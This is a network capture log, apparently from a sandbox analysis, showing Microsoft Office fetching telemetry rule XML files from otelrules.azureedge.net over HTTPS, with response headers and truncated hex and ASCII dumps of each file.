                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                x-ms-request-id: 7d21ea5d-701e-0098-0502-17395f000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48q6t9vvmrkd293mg000000023000000000aggt
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                138192.168.2.65854713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                x-ms-request-id: b6fa471e-401e-0067-43e5-1609c2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd482tlqpvyz9e93p54000000024000000000htgk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                139192.168.2.65854513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                x-ms-request-id: 08bf7a15-f01e-0020-7706-17956b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48vhs7r2p1ky7cs5w000000029g00000000pv85
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                140192.168.2.65854813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                x-ms-request-id: 77012b0e-b01e-0097-0bff-164f33000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144212Z-1657d5bbd48vlsxxpe15ac3q7n000000022000000000dfhv
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                141192.168.2.65855113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4d5cca78-701e-0021-6ae5-163d45000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144212Z-1657d5bbd48762wn1qw4s5sd300000000210000000006y81
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                142192.168.2.65854913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1391
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                x-ms-request-id: a18d9b1d-601e-0002-1f03-17a786000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144212Z-1657d5bbd48xdq5dkwwugdpzr000000002f0000000007h30
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                143192.168.2.65855013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1354
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                x-ms-request-id: d4fd285a-d01e-005a-06ed-167fd9000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144212Z-1657d5bbd48jwrqbupe3ktsx9w00000002b000000000a1c2
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                144192.168.2.65855213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                x-ms-request-id: c9f5ea47-201e-0071-33fe-16ff15000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144212Z-1657d5bbd48vlsxxpe15ac3q7n00000001z000000000n482
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:12 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                145192.168.2.65855513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:13 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4d8e5842-701e-0021-0efe-163d45000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144213Z-1657d5bbd48sdh4cyzadbb374800000001x000000000evan
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
